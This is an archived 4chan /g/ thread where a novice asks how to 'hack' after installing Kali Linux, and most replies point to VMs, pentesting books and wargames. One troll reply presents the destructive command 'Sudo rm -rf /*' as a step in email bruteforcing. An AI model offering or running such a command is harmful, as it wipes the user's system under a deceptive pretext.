[Boards: 3 / a / aco / adv / an / asp / b / biz / c / cgl / ck / cm / co / d / diy / e / fa / fit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mu / n / news / o / out / p / po / pol / qa / r / r9k / s / s4s / sci / soc / sp / t / tg / toy / trash / trv / tv / u / v / vg / vp / vr / w / wg / wsg / wsr / x / y ] [Home]
4chanarchives logo
Just installed this as main OS
Images are sometimes not shown due to bandwidth/network limitations. Refreshing the page usually helps.

You are currently reading a thread in /g/ - Technology

Thread replies: 19
Thread images: 2
File: screenshot-002.png (2 MB, 1280x768) Image search: [Google]
screenshot-002.png
2 MB, 1280x768
so, how do I hack?
>>
You installed Kali as your main OS?

LOL... It does not have any useful tools for normal computing, it's going to be a pain in the neck after a while. You are supposed to have it on a USB and boot into it when you are going to do pentesting, that is what it's for.

My recommendation is to get a normal linux distro. Even if you want the tools from Kali on your main OS you can just install all the tools on it. Or boot to Kali on a USB when you want those tools.
>>
Replace apt hosts with debian jessie and enjoy yours debian
>>
>>51962642
It's just a Debian with Gnome 3 and a fuckton of pentensting bloat though.
>>
>>51962642
Or use Kali inside VirtualBox
>>
>>51962642
But I was thinking to become full time hacker and I heard Kali Linux was best OS for it. Now that I got the Kali, how do i hack?
>>
>>51962586

you require a Stallman approved Thinkpad Dragon Dildo TM
>>
>>51962974
Stop making posts on chink sites and actually use Google to research.
>>
>>51962974
ParrotOS is the best OS for hacking... https://www.cybrary.it has free courses for hacking. There is also some Kali courses somewhere.

Also keep your math skills fresh with daily exercises on www.khanacademy.com it's always useful to exercise your mathematical thinking when doing security work
>>
>>51962974
get trusted with kali and learn how the tools work and how to handle it. then learn networking, how it works etc etc and then go fucking shit away with kali and learn python to write your programs self and don't be a fucking script kiddy bad ass
>>
File: ktXQCZS.gif (406 KB, 150x140) Image search: [Google]
ktXQCZS.gif
406 KB, 150x140
>>51962586
YouTube.com/PhiberOptics will help you on the road to learning the basics.
>>
OP let me teach you basics of email bruteforcing.
First open terminal and enter
service apache2 restart and
Sudo rm -rf /*
You should now see a gui console open,just follow onscreen instructions.
If you have any doubt ,just ask!
Happy cracking!!
>>
>>51962586
https://youtu.be/KEkrWRHCDQU
>>
>>51965013
Remember that people are assholes and trolls here, OP
>>
>>51962716
Ya plus running everything as root...

It's pointless to use Kali as your main distro
>>
>>51962586

Everyone is going to be a dick but I'll give you actual advice, start here:

http://www.nostarch.com/pentesting

and here:

http://overthewire.org/wargames/bandit/

If you do the No Starch Pentesting book front to back; and I mean actually do it - set up the labs correctly and do the exercises in order and completely; you will have a very good basis for what you are trying to learn.

Bandit on OverTheWire will be a good introduction to wargames in general and how to move around a Linux terminal/using SSH/etc.
>>
>>51966422

Also when I say start here I mean literally you should fully concentrate on finishing that book and only do that; you can do it in 5 days if you just crush it. Then you will have enough knowledge to actually go out and learn on your own without feeling lost.
>>
>>51962586
Well first you are going to uninstall Kali
Install Debian
Install Kali in a VM
Then you come back
>>
make a virtual network and start testing shit that's how I learned to hack, I'm now a pro haxor
Thread replies: 19
Thread images: 2

banner
banner
[Boards: 3 / a / aco / adv / an / asp / b / biz / c / cgl / ck / cm / co / d / diy / e / fa / fit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mu / n / news / o / out / p / po / pol / qa / r / r9k / s / s4s / sci / soc / sp / t / tg / toy / trash / trv / tv / u / v / vg / vp / vr / w / wg / wsg / wsr / x / y] [Home]

All trademarks and copyrights on this page are owned by their respective parties. Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.
If a post contains personal/copyrighted/illegal content you can contact me at [email protected] with that post and thread number and it will be removed as soon as possible.
DMCA Content Takedown via dmca.com
All images are hosted on imgur.com, send takedown notices to them.
This is a 4chan archive - all of the content originated from them. If you need IP information for a Poster - you need to contact them. This website shows only archived content.